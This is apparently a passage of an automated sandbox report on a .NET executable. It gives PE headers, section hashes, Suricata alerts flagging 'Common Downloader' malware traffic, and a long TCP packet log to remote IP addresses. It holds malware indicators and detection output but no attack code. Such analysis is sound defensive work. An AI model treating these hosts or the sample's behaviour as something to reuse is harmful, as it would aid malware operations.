                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x211600x4b.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x220000x560.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x240000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x1f1b40x1f20057c18b06a2757332bac191fd8a5bcf1fFalse0.45260730421686746data5.860755674701272IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x220000x5600x6003e5ff1bf69cdd74e4028661615a21a44False0.4016927083333333data3.898030280104735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x240000xc0x20047b0c31ec6e633a644b7d324071ad38bFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_VERSION0x220a00x30cdata0.4256410256410256
                                                      RT_MANIFEST0x223ac0x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-10-30T07:57:37.356642+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705193.122.130.080TCP
                                                      2024-10-30T07:57:38.466060+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549705193.122.130.080TCP
                                                      2024-10-30T07:57:39.186966+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549707188.114.96.3443TCP
                                                      2024-10-30T07:57:39.903580+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549708193.122.130.080TCP
                                                      2024-10-30T07:57:43.541237+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549713188.114.96.3443TCP
                                                      2024-10-30T07:57:55.747290+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549750193.122.130.080TCP
                                                      2024-10-30T07:57:56.950406+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549750193.122.130.080TCP
                                                      2024-10-30T07:57:57.641366+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549765188.114.96.3443TCP
                                                      2024-10-30T07:57:58.356676+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549767193.122.130.080TCP
                                                      2024-10-30T07:58:00.538612+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549785188.114.96.3443TCP
                                                      2024-10-30T07:58:03.651769+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549804188.114.96.3443TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 30, 2024 07:57:30.959914923 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:30.960030079 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:30.960136890 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:31.041723013 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:31.041804075 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.002305031 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.002507925 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:32.036822081 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:32.036916971 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.037883043 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.091017962 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:32.323623896 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:32.367353916 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.606174946 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.653558016 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:32.758572102 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.758589029 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.758641005 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.758661032 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.758673906 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.758903980 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:32.758938074 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.759000063 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:32.760734081 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.760744095 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.760792017 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.760818958 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.760821104 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:32.760833979 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.760849953 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:32.760869026 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:32.911519051 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.911551952 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.911705017 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:32.911760092 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.911820889 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:32.913311005 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.913331032 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.913422108 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:32.913444042 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:32.913507938 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.063287020 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.063327074 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.063450098 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.063473940 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.063517094 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.064549923 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.064569950 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.064623117 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.064629078 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.064670086 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.065696001 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.065713882 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.065757036 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.065763950 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.065804958 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.066611052 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.066631079 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.066673040 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.066679001 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.066715002 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.216320992 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.216353893 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.216474056 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.216521978 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.216607094 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.217156887 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.217180014 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.217233896 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.217247963 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.217279911 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.217308044 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.218202114 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.218220949 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.218290091 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.218303919 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.218365908 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.219131947 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.219150066 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.219232082 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.219244003 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.219296932 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.368288040 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.368354082 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.368491888 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.368520021 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.368537903 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.368565083 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.368908882 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.368953943 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.368974924 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.368983030 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.369009972 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.369029999 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.369596004 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.369641066 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.369668961 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.369682074 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.369700909 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.369720936 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.373613119 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.373657942 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.373725891 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.373733997 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.373764038 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.373780012 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.521123886 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.521158934 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.521261930 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.521296024 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.521315098 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.521341085 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.521431923 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.521447897 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.521497965 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.521503925 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.521533012 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.521552086 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.521783113 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.521799088 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.521842003 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.521847963 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.521874905 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.521892071 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.522097111 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.522111893 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.522167921 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.522173882 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.522213936 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.522530079 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.522546053 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.522603989 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.522609949 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.522646904 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.673084021 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.673135996 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.673202038 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.673280001 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.673320055 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.673343897 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.673532009 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.673556089 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.673604965 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.673618078 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.673646927 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.673671007 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.674158096 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.674182892 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.674232960 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.674245119 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.674271107 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.674288034 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.674479961 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.674496889 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.674566984 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.674581051 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.674633980 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.674990892 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.675005913 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.675062895 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.675076962 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.675133944 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.825490952 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.825541019 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.825628042 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.825654984 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.825673103 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.825699091 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.826055050 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.826088905 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.826131105 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.826138020 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.826165915 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.826186895 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.826404095 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.826441050 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.826476097 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.826482058 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.826512098 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.826529980 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827028036 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827064037 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827105999 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827114105 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827126980 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827148914 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827339888 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827370882 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827408075 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827414036 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827429056 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827466965 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827645063 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827685118 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827718973 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827725887 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827769995 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827769995 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.978326082 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.978349924 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.978511095 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.978537083 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.978579998 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.978928089 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.978943110 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979000092 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.979007006 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979043007 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.979362011 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979377985 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979428053 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.979435921 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979458094 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.979479074 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.979782104 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979796886 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979846954 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.979855061 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979890108 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.980266094 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.980282068 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.980346918 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.980353117 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.980376959 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.980395079 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.980647087 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.980669022 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.980715036 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.980720043 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.980752945 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.131182909 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.131212950 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.131320000 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.131352901 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.131403923 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.131498098 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.131513119 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.131620884 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.131628036 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.131676912 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.131937027 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.131953955 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132203102 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.132213116 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132265091 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.132406950 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132425070 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132462025 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.132467985 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132515907 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.132801056 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132817984 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132884026 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.132890940 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.132934093 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.283627987 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.283653975 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.283874035 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.283890963 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.283925056 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.283974886 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.284020901 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.284044981 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.284321070 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.284337044 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.284389019 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.284404993 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.284421921 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.284765959 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.284784079 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:34.284976959 CET49704443192.168.2.5188.132.193.46
